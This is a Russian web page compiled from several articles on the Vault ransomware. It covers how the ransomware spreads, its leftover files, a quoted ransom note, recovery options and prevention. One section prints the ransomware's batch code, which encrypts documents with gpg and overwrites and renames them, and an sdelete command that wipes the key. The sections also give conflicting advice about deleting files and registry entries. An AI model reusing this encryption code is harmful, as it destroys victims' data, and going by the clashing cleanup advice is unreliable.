Главная › Телефон › Как убрать vault расширение. Как обезопасить себя от вируса Vault. Вирус Vault — что делать

Как убрать vault расширение. Как обезопасить себя от вируса Vault. Вирус Vault — что делать

Вирусы могут создавать назойливую рекламу и использовать ваш трафик для своих нужд. Но вдвойне неприятно, когда хакеры опускаются к шантажу, ограничивая доступ к вашим файлам и требуют деньги. Если вы потеряли доступ к документам, и для нормальной работы нужно заплатить, то вы стали жертвой опасного вируса Vault который активно распространяется по сети.

Что представляет собой вирус Vault?

Данный вирус относится к программам-шифровальщикам. Он загружает на ваш компьютер простую программу, которая зашифровывает файлы Word, Excel, mp3-файлы, графические изображения, присваивая им расширение *.Vault.

После шифровки, пользователь полностью теряет доступ к данным. Для возобновления доступа, программой создается специальный ключ. Он остается в руках хакеров. За предоставление ключа, шантажисты требуют деньги.

Пути распространения

Вирус распространяется в замаскированном виде через электронную почту, Skype или социальные сети. Представляет собой исполняемый скрипт с расширением.js. В ряде случаев злоумышленники запаковывают вирус в архив, чтобы его сложнее можно было отследить.

После того, как пользователь запускает скрипт, вирус скачивается с серверов хакеров, а затем поселяется в папке TEMP и шифрует файлы. Антивирусы не блокируют Vault, т.к. видят в нем безопасный шифровальщик, - полезную утилиту, которую используют для защиты данных от взломщиков.

Удаление

К тому моменту, когда вы обнаружили вирус, он уже успел сделать грязную работу. Поэтому, хакеры особо не заморачиваются над тем, чтобы создавать какую-либо защиту для своего детища. Файлы трояна расположены в папке TEMP .

Удалять все подряд ни в коем случае нельзя. Перед тем как удалить вирус Vault с компьютера, обязательно сохраните следующие файлы:

CONFIRMATION.KEY - отображает количество зашифрованных файлов. Это своеобразная «смета» для злоумышленников. Благодаря ей, они определяют количество средств, которые они готовы потребовать за возобновление доступа.
Vault.KEY - ключ к данным. Он содержит идентификатор, который используют хакеры, чтобы подобрать ключ доступа к именно вашим файлам.
Vault.txt - общая информация о порядке возобновления и сайте взломщиков.

Не факт, что эти файлы вам понадобятся. Но на всякий случай лучше их хранить.

После того как вы очистили папку, сканируйте систему бесплатной программой CureIT от DrWeb , и антивирусом . Затем нужно перезагрузить компьютер и запустить диспетчер задач. Если среди процессов нет подозрительных, значит, все прошло правильно, и самая легкая часть пути осталась позади.

Расшифровка файлов после заражения

В своих обращениях к жертвам, хакеры пишут: «Поспешите, у вас мало времени», или «Время работает против вас». Злоумышленникам нужно, чтобы вы паниковали, чтобы приняли спонтанное решение, не думая расстались с деньгами за доступ к важным файлам. Действовать нужно строго наоборот. У вас есть зашифрованные файлы, и способы вернуть к ним доступ:

Купить ключ у вымогателей.
Попытаться найти следы ключа на своем компьютере.
Восстановить резервные копии файлов.
Воспользоваться решениями от антивирусных лабораторий.

Покупка ключа у хакеров

Покупать ключ у хакеров, это как выполнять требования террористов. С моральной точки зрения – очевидно, худшая затея. Деньги, которыми вы спонсируете собственный обман позже потратят на усовершенствованные виды мошенничества. Но этот вариант имеет место, ведь есть подтвержденные случаи возвращения доступа после оплаты.

Поиск дешифратора в системе

Гораздо лучше – попытаться восстановить файлы самостоятельно. Есть простой способ как восстановить файлы после Vault вируса. Поскольку в основе вредоносного ПО лежит безопасная программа-шифровщик, дешифровальный ключ создается изначально на жестком диске компьютера. Затем он отправляется на сервер взломщиков. А уже потом – удаляется. Поэтому первым делом ищите ключ. Возможно, он еще не удален. Имя ключа secring.gpg. Если удастся найти его в системе – вам повезло.

Восстановление сохраненных копий

Можно также восстановить копии файлов. Если у вас активирована защита системы, Windows применяет к файлам процедуру резервного копирования. Жмем на файл правой кнопкой, открываем вкладку «Свойства». В открывшемся окне нажимаем «Предыдущие версии». Восстанавливаем их, и пользуемся.

Совет! Старайтесь не забывать о создании точек восстановления системы . Они могут выручить вас там, где не работают обычные методы устранения проблемы.

Решения от антивирусных лабораторий

И «Лаборатория Касперского» и DrWeb признают, что бороться с шифровальными вирусами тяжело. Также трудно и определить их в системе. Но у антивирусных лабораторий есть дешифраторы, которые в ряде случаев помогают в ситуации. У «Касперского» это RectorDecryptor. Утилита сама ищет и исправляет пораженные файлы.

Если этот вариант не помог, отправляйте файл на анализ в DrWeb, и там подберут дешифратор к конкретному случаю. Запрос с описанием проблемы пишите в поддержку на официальном сайте лаборатории. Ознакомившись с проблемой, специалисты предложат отправить 3 файла:

CONFIRMATION.KEY;
Vault.KEY;
Пример зашифрованного файла.

В результате, вы получите или настроенную под конкретный случай утилиту для разблокировки всех файлов либо существующего файла.

Услуги сторонних компаний

В связи с распространением вируса, участилось количество веб-сервисов, предлагающих разблокировку за деньги. Пользоваться такими услугами нельзя ни в коем случае. Как предупреждают в «Лаборатории Касперского», в случае, когда прогрессивные аналитические центры не способны решить проблему, надеяться на спасение от сомнительной организации не стоит.

Не стоит пользоваться и программами, которые предлагают установить такие организации. Vault часто использует открытый способ шифровки RSA-1024 , и технически, разблокировать его машинным способом просто невозможно.

Как уберечь себя от вируса в будущем

Vault-вирус крайне редко определяется антивирусными программами. Поэтом, есть ряд правил, руководствуясь которыми можно уберечь себя от шифровальщиков в будущем:

Проверяйте файлы. Документы с расширением.js, которые приходят вам на почту или в социальные сети, априори опасны. Открывать их не стоит, а если вы хотите принять участие в борьбе с хакерами – лучше сразу отправлять на анализ в антивирусные лаборатории.
Копируйте данные. Храните резервные копии там, где вирус не сможет их повредить. Используйте съемные носители. Синхронизируйте с облачными сервисами, такими как OneCloud, DropBox, GoogleDrive, или Я.Диск.
Доверяйте проверенным источником. Отказывайтесь от программ, в источниках которых вы не уверены. Если у приложения доступен официальный поставщик – лучше пользоваться им, а не решениями от неизвестных организаций.
Откажитесь от пиратской продукции. Мошенники не приходят одни. Когда вы скачиваете взломанную игру, или программное обеспечение, то рискуете получить вшитый вирус. Лицензия - это растраты. Вместе с тем и безопасность.

Специалисты антивирусной компании «Доктор Веб» разработали методику расшифровки файлов, ставших недоступными в результате действия опасного троянца-энкодера Trojan.Encoder.2843 , известного пользователям под именем «Vault».

Данная версия шифровальщика, получившая по классификации Dr.Web наименование Trojan.Encoder.2843 , активно распространяется злоумышленниками при помощи массовых почтовых рассылок. В качестве вложения в письма используется небольшой файл, содержащий сценарий на языке JavaScript. Этот файл извлекает из себя приложение, которое и выполняет остальные действия, необходимые для обеспечения работы энкодера. Данная версия троянца-шифровальщика распространяется со 2 ноября 2015 года.

Принцип работы этой вредоносной программы также весьма любопытен. В системный реестр Windows записывается зашифрованная динамическая библиотека (.DLL), а в запущенный процесс explorer.exe троянец встраивает небольшой код, который считывает файл из реестра в память, расшифровывает и передает на него управление.

Список шифруемых файлов Trojan.Encoder.2843 также хранит в системном реестре и для каждого из них использует уникальный ключ, состоящий из заглавных латинских букв. Шифрование файлов осуществляется с использованием алгоритмов Blowfish-ECB, сессионный ключ шифруется с использованием RSA при помощи интерфейса CryptoAPI. Каждому зашифрованному файлу присваивается расширение.vault.

Специалисты компании «Доктор Веб» разработали специальную методику, во многих случаях позволяющую расшифровывать поврежденные этим троянцем файлы. Если вы стали жертвой вредоносной программы Trojan.Encoder.2843 , воспользуйтесь следующими рекомендациями:

обратитесь с соответствующим заявлением в полицию;
ни в коем случае не пытайтесь переустановить операционную систему, «оптимизировать» или «очистить» ее с использованием каких-либо утилит;
не удаляйте никакие файлы на вашем компьютере;
не пытайтесь восстановить зашифрованные файлы самостоятельно;
обратитесь в службу технической поддержки компании «Доктор Веб» (эта услуга бесплатна для пользователей коммерческих лицензий Dr.Web);
к тикету приложите любой зашифрованный троянцем файл;
дождитесь ответа специалиста службы технической поддержки; в связи с большим количеством запросов это может занять некоторое время.

Напоминаем, что услуги по расшифровке файлов оказываются только обладателям коммерческих лицензий на антивирусные продукты Dr.Web. Компания «Доктор Веб» не дает полной гарантии расшифровки всех поврежденных в результате действия энкодера файлов, однако наши специалисты приложат все усилия, чтобы спасти зашифрованную информацию.

Файлы с расширением.vault являются следствием работы вируса-шифровальщика. Разные версии этого вируса-шифровальщика ведут себя по-разному, как правило они шифруют содержимое всех документов и изображений до которых могут дотянуться и меняют расширение файла на.vault. Т.е. файлы с расширением.doc, .xls, .jpg, .pdf и прочие, внезапно переименовываются в.doc.vault, .xls.vault, .jpg.vault, .pdf.vault. Открыть их при помощи привычных программ не удается. Обычно такая неприятность сопровождается сообщением на рабочем столе, в котором злоумышленники сообщают, что документы были зашифрованы и для их расшифровки нужно заплатить определенную сумму определенным образом.

Платить деньги изготовителям вируса - последнее дело. Ведь отдавая им деньги, мы тем самым поощряем их дальнейшую деятельность.

Что делать, если на вашем компьютере появились файлы с расширением.vault?

Отключите компьютер! Сразу! Возможно даже выдернув его из розетки или выключив сетевой фильтр. Ведь каждую секунду вредоносная программа зашифровывает ваши файлы. Чем мощнее компьютер, тем быстрее шифруются документы.

Если не чуствуете себя уверенно, вызовите компьютерного специалиста, который сможет помочь.

Если на вашем компьютере был установлен коммерческий антивирус, то стоит обратиться в техническую поддержку компании производителя антивируса. Техподдержка раскажет смогут ли они вам помочь с расшифровкой и дадут все необходимые инструкции: что им прислать и в каком виде.

Ну а если чуствуете в себе силы побороться с вирусом самостоятельно, то стоит вооружиться загрузочной флешкой или диском, чтобы загрузить компьютер в незараженную операционную систему и оттуда разбираться с заразой. (см. «Как лечить компьютер от вирусов?»)

В первую очередь, необходимо удалить сам шифровальщик. Вариаций этих вирусов-шифровальщиков очень много, но очень часто тело самого вируса можно найти в папке временных файлов - C:\Users\ИМЯ-ПОЛЬЗОВАТЕЛЯ\AppData\Local\Temp (для Windows 7, 8, 10) или C:\Documents and Settings\ИМЯ-ПОЛЬЗОВАТЕЛЯ\Local Settings\Temp (для Windows XP). Проверьте реестр, папки автозапуска, там может быть точное указание на сам вирус.

После удаления заразы с компьютера можно приступать к восстановлению данных. В этом вам должны помочь резервные копии и теневое копирование.

Если вы не нашли ответ или нужную информацию, задайте вопрос через

На сегодняшний день тема Vault-вирусов достаточно актуальна. Очень многие пользователи часто интересуются, а что же делать в случае заражения персонального компьютера, и что можно предпринять, чтобы удалить вредоносную программу раз и навсегда.

Vault-вирус – это некий шифровальщик данных. Он проникает в систему и меняет расширения данных, которые находятся на компьютере. Намного серьезнее проблема становится в тот момент, когда вирус поражает системные файлы.

Когда компьютер заражается Vault-вирусом, в первую очередь важно определить, откуда он появился. Шифровальщик данных может выглядеть по-разному. У одних пользователей он выглядит как программа архиватор, у других выступает в качестве расширения для браузера. В любой из этих случаев выход лишь один – это удаление, поэтому рассмотрим подробнее vault вирус и как удалить его.

Как удалить вирус Vault?

Чтобы избавиться от вируса, необходимо просканировать компьютер на наличие вирусов и шпионов. Здесь на помощь придет антивирусная программа. Самым оптимальным вариантом будет Nod32 или Dr.Web. Можно применять и «Аваст». В первую очередь у антивирусной программы необходимо обновить вирусную базу данных. После этого только приступать к глубокой проверке. Процедура обычно занимает достаточное количество времени.

После проверки системы антивирусной программой необходимо проанализировать результаты. В перечне удаленных вредоносных программ должен присутствовать вирус шифровальщик vault. Все вредоносные программы необходимо вылечить либо, в случае если это действие будет недоступно, удалить их. После этого необходимо преступить к следующему этапу.

Vault-вирусы часто любят создавать разный бесполезный контент. при этом зашифровывая данные. Этот контент, а также программы, которые долгое время не использовались, необходимо удалить с компьютера. Удаление этих вещей значительно упрощает решение проблемы.

Для этого необходимо зайти в «Панель управления» и найти «Установка и удаление программ». После загрузки списка, необходимо удалить все незнакомые программы. Важно также удалить и приложения, которыми долгое время уже никто не пользовался. Следующим шагом будет очистка реестра.

Многие пользователи, которые задумываются о vault вирусе и как удалить его, практически не уделяют внимания реестру. Это напрасно, так как в реестре регистрируются все программы, в том числе и вредоносные. Для очистки реестра от вредоносной программы необходимо выполнить следующие действия.

Нажав на клавиатуре Windows+R, появится окно, в котором нужно запустить команду regedit. Откроется реестр. После попадания в редактор реестра в левой части можно увидеть много различных папок, которые имеют длинные названия. Их надо все обойти по возможности удалить все подозрительные ветки. Главной целью является «Правка» этих файлов. Но хочу предостеречь вас, не надо удалять все файлы с упоминанием слова VAULT, некоторые из них нужны для корректной работы системы.

В процессе избавления от вирусов важно прибегать к помощи дополнительных утилит. Они способны искать вирусы и защищать компьютер путем обезвреживания вредоносных программ. Хорошим примером выступает программа Ccleaner. Программа способна отлично чистить компьютер, а также освобождать место на системном диске.

Для избавления от самого вируса шифровальщика vault можно применять программу SpyHunter, способную обнаруживать шпионов, вирусы и различные вредоносные файлы.

Как восстановить файлы после Vault-вируса?

Чтобы восстановить утраченный контент, можно воспользоваться сохраненными копиями и просто перезаписать данные на устройство. Однако бывают ситуации, когда сохраненных копий просто не существует после того, как в компьютере «похозяйничал» вирус Vault. Как расшифровать файлы, если нет копий. В этом случае придется воспользоваться антивирусными программами. Для этого необходимо отправить зашифрованные данные их службам, которые, в свою очередь, возвращают уже расшифрованные данные. Весьма успешно с этой задачей умеет справляться Dr.Web.

Скорее всего вы встретились с такой проблемой как шифрование ваших файлов и соответственно без вашего ведома, желания. Открыв ссылку в письме, которое пришло к вам по почте и скорее всего от проверенного отправителя с которым вы уже вели переписку. Но может и как реклама! Но факт на лицо и у вас появились ниже приведенные симптомы, которые проявились следующим образом:

Внезапно открывается текстовый файл в блокноте, следующего содержания:

Ваши рабочие документы и базы данных были заблокированы и помечены форматом.vаult
Для их восстановления необходимо получить уникальный ключ
ПРОЦЕДУРА ПОЛУЧЕНИЯ КЛЮЧА:
КРАТКО
1. Зайдите на наш веб-ресурс
2. Гарантированно получите Ваш ключ
3. Восстановите файлы в прежний вид
ДЕТАЛЬНО
Шаг 1:
Скачайте Tor браузер с официального сайта:
Шаг 2:
Используя Tor браузер посетите сайт:
Шаг 3:
Найдите Ваш уникальный VAULT.KEY на компьютере — это Ваш ключ к личной клиент-панели. Не удалите его
Авторизуйтесь на сайте используя ключ VAULT.KEY
Перейдите в раздел FAQ и ознакомьтесь с дальнейшей процедурой
STEP 4:
После получения ключа, Вы можете восстановить файлы используя наше ПО с открытым исходным кодом или же безопасно использовать своё ПО
ДОПОЛНИТЕЛЬНО
a) Вы не сможете восстановить файлы без уникального ключа (который безопасно хранится на нашем сервере)
b) Если Вы не можете найти Ваш VAULT.KEY, поищите во временной папке TEMP
c) Ваша стоимость восстановления не окончательная, пишите в чат
Дата блокировки: 08.04.2015 (11:14)

На ваше усмотрение. Вы можете сделать как написано в файле(но я бы не стал). Почему? Потому что это не надежно, платить вымогальшикам это поддерживать и развивать их силу. Да и потом, врятли вы получите, ключ расшифровки.
Появление такого сообщения уже означает, что vault вирус заразил ваш компьютер и начал шифрование файлов. В этот момент необходимо сразу же выключить компьютер, отключить его от сети и вынуть все сменные носители. Как провести лечение от вируса мы поговорим позже, а пока я расскажу, что же произошло у вас в системе.
Скорее всего вам пришло письмо по почте от доверенного контрагента или замаскированное под известную организацию. Это может быть просьба провести бухгалтерскую сверку за какой-то период, просьба подтвердить оплату счета по договору, предложение ознакомиться с кредитной задолженностью в сбербанке или что-то другое. Но информация будет такова, что непременно вас заинтересует и вы откроете почтовое вложение с вирусом. На это и расчет.
Итак, вы открываете вложение, которое имеет расширение.js и является ява скриптом. По идее, это уже должно вас насторожить и остановить от открытия, но если вы читаете эти строки, значит не насторожило и не остановило. Скрипт скачивает с сервера злоумышленников троян или банер ваулт, как его в данном случае можно назвать, и программу для шифрования. Складывает все это во временную директорию пользователя. И сразу начинается процесс шифрования файлов во всех местах, куда у пользователя есть доступ - сетевые диски, флешки, внешние харды и т.д.
В качестве шифровальщика vault выступает бесплатная утилита для шифрования gpg и популярный алгоритм шифрования - RSA-1024. Так как по своей сути эта утилита много где используется, не является вирусом сама по себе, антивирусы пропускают и не блокируют ее работу. Формируется открытый и закрытый ключ для шифрования файлов. Закрытый ключ остается на сервере хакеров, открытый на компьютере пользователя.
Проходит некоторое время после начала процесса шифрования. Оно зависит от нескольких факторов - скорости доступа к файлам, производительности компьютера. Дальше появляется информационное сообщение в текстовом файле, содержание которого я привел в самом начале. В этот момент часть информации уже зашифрована.
Конкретно мне попалась модификация вируса vault, которая работала только на 32 битных системах. Причем на Windows 7 с включенным UAC выскакивает запрос на ввод пароля администратора. Без ввода пароля вирус ничего сделать не сможет. На Windows XP он начинает работу сразу после открытия файла из почты, никаких вопросов не задает.

Вирус ставит расширение vault на doc, jpg, xls и других файлах

Что же конкретно делает с файлами вирус? На первый взгляд кажется, что он просто меняет расширение со стандартного на.vault. Когда я первый раз увидел работу этого virus-шифровальщика, я так и подумал, что это детская разводка. Переименовал обратно файл и очень удивился, когда он не открылся как полагается, а вместо положенного содержания открылась каша из непонятных символов. Тут я понял, то все не так просто, начал разбираться и искать информацию.
Вирус прошелся по всем популярным типам файлов - doc, docx, xls, xlsx, jpeg, pdf и другим. К стандартному имени файла прибавилось новое расширение.vault. Некоторым он шифрует и файлы с локальными базами 1С. У меня таких не было, так что сам лично я это не наблюдал. Простое переименовывание файла обратно, как вы понимаете, тут не помогает.
Так как процесс шифрования не мгновенный, может так получиться, что когда вы узнаете о том, что у вас шурует вирус на компьютере, часть файлов еще будет нормальная, а часть зараженная. Хорошо, если не тронутой останется большая часть. Но чаще всего на это рассчитывать не приходится.
Расскажу, что скрывается за сменой расширения. После шифрования, к примеру, файла file.doc рядом с ним вирус vault создает зашифрованный файл file.doc.gpg, затем зашифрованный file.doc.gpg перемещается на место исходного с новым именем file.doc, и только после этого переименовывается в file.doc.vault. Получается, что исходный файл не удаляется, а перезаписывается зашифрованным документом. После этого его невозможно восстановить стандартными средствами по восстановлению удаленных файлов. Вот часть кода, которая реализует подобный функционал:

dir /B "%1:"&& for /r "%1:" %%i in (*.xls *.doc) do (echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst" echo %%i>> "%temp%\conf.list")

Как удалить вирус vault и вылечить компьютер

После обнаружения вируса шифровальщика первым делом необходимо от него избавиться, проведя лечение компьютера. Лучше всего загрузиться с какого-нибудь загрузочного диска и вручную очистить систему. Virus vault в плане въедливости в систему не сложный, вычистить его легко самому. Я подробно не буду останавливаться на этом моменте, так как тут подойдут стандартные рекомендации по удалению вирусов шифровальщиков, банеров и троянов.
Само тело вируса находится во временной папке temp пользователя, который его запустил. Вирус состоит из следующих файлов. Названия могут меняться, но структура будет примерно такой же:

3c21b8d9.cmd
04fba9ba_VAULT.KEY
CONFIRMATION.KEY
fabac41c.js
Sdc0.bat
VAULT.KEY
VAULT.txt

VAULT.KEY - ключ шифрования. Если вы хотите расшифровать ваши данные, этот файл обязательно надо сохранить. Его передают злоумышленникам и они на его основе выдают вам вторую пару ключа, с помощью которого будет происходить расшифровка. Если этот файл потерять, данные восстановить будет невозможно даже за деньги.

CONFIRMATION.KEY - содержит информацию о зашифрованных файлах. Его попросят преступники, чтобы посчитать сколько денег с вас взять.

Остальные файлы служебные, их можно удалять. После удаления надо почистить автозагрузку, чтобы не было ссылок на удаленные файлы и ошибок при запуске. Теперь можно запускать компьютер и оценивать масштабы трагедии.

Как восстановить и расшифровать файлы после вируса vault

Вот мы и подошли к самому главному моменту. Как же нам получить обратно свою информацию. Компьютер мы вылечили, что могли восстановили, прервав шифрование. Теперь надо попытаться расшифровать файлы. Конечно, проще и желанней всего было бы получить готовый дешифратор для расшифровки, но его не существует. Увы, но создать инструмент, чтобы дешифровать данные, зашифрованные ключом RSA-1024 технически невозможно/ Так что к великому сожалению, вариантов тут не очень много:

Вам очень повезло, если у вас включена защита системы. Она включается для каждого диска отдельно. Если это было сделано, то вы можете воспользоваться инструментом восстановления предыдущих версий файлов и папок. Находится он всвойствах файла. Подробнее можно поискать в интернете, статей по поводу этого инструмента восстановления достаточно.

Если у вас оказались зашифрованы файлы на сетевых дисках, ищите архивные копии, проверяйте, не включена ли на этих дисках корзина, там будут ваши исходные файлы. Хотя стандартно на сетевых дисках ее нет, но можно настроить отдельно. Я чаще всего это делаю, когда настраиваю сетевые шары. Вспомните, нет ли у вас архивных копий ваших локальных данных.

Если у вас пострадали данные в папках, которые подключены к хранилищам данных в интернете типа Яндекс. Диск, Dropbox, Google disk, загляните к ним в корзину, там должны остаться оригинальные файлы до шифрования.

Попробуйте найти файл secring.gpg .Файл этот должен быть создан на вашей машине (как правило в %TEMP% юзера) в момент запуска процесса шифрования. К сожалению, вероятность успешного поиска secring.gpg невелика, поскольку шифратор тщательно затирает данный ключ с помощью утилиты sdelete.exe:

"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\secring.gpg"

Повторный запуск шифратора с целью получения этого ключа не поможет. Ключ будет создан уже с другим отпечатком и ID, и для расшифровки ваших документов не подойдет. Пробуйте искать данный ключ среди удаленных файлов, но обязательно ненулевого размера ~1Кб.

Если ничего из перечисленного выше вам не помогло, а информация очень важная, у вас остается только один вариант - платить деньги создателям вируса. Но, как я писал выше, лично я бы не стал. Вирус vault настолько популярен, что в сети появилась реклама, где некие товарищи предлагают за деньги торговаться с хакерами, чтобы сбить цену на расшифровку данных. Я не знаю, насколько реально они сбивают цену и сбивают ли вообще, возможно это просто разводилы, которые возьмут с вас деньги и смоются. Что скорее всего так и будет. Вообще, выходит чистая уголовщина. Даже правительство не платит терористам, а на счету жизни. Решать вам. Напишите если что получиться.

Касперский, drweb и другие антивирусы в борьбе с шифровальщиком vault

А что же антивирусы нам могут предложить в борьбе с этой зашифрованной напастью? Лично я был свидетелем заражения вирусом на компьютерах с установленной и полностью обновленной лицензионной версией Kaspersky. Он никак не отреагировал на запуск шифровальщика. Это было в начале мая 2015г. Возможно уже сейчас что-то изменилось, но на момент моего поиска информации по данному вопросу, ни один из вирусов не гарантировал защиту пользователя от подобных угроз. Я читал форумы популярных антивирусов - Kaspersky, DrWeb и другие. Везде разводят руками. Если вам предложат скачать другую какую не известную вам утилиту, что расшифровать файлы. Не стоит это делать, скорей всего вы получите еще один вирус.

Методы защиты от vault вируса

Методов защиты конкретно для данного вируса нет, есть только общепринятые, для всех вирусов.

Не запускайте незнакомые приложения, ни в почте, ни скачанные из интернета. Старайтесь вообще из интернета ничего не качать и не запускать. Там сейчас столько всякой гадости валяется на файлопомойках, что защититься от них без должного понимания практически невозможно. Попросите лучше компетентного знакомого вам что-то найти в интернете и отблагодарите его за это.

Всегда имейте резервную копию важных данных. Причем хранить ее нужно отключенной от компьютера или сети. Храните отдельную флешку или внешний жесткий диск для архивных копий. Подключайте их раз в неделю к компьютеру, копируйте файлы, отключайте и больше не пользуйтесь. Для повседневных нужд приобретайте отдельные устройства, сейчас они очень доступны, не экономьте. В современный век информационных технологий информация — самый ценный ресурс, важнее носителей. Лучше купить лишнюю флешку, чем потерять важные данные.

Повысьте меру своего понимания происходящих в компьютере процессах. Сейчас компьютеры, планшеты, ноутбуки, смартфоны настолько плотно вошли в нашу жизнь, что не уметь в них разбираться значит отставать от современного ритма жизни. Никакой антивирус и специалист не сможет защитить ваши данные, если вы сами не научитесь это делать. Уделите время, почитайте тематические статьи на тему информационной безопасности, сходите на соответствующие курсы, повысьте свою компьютерную грамотность. Это в современной жизни обязательно пригодится.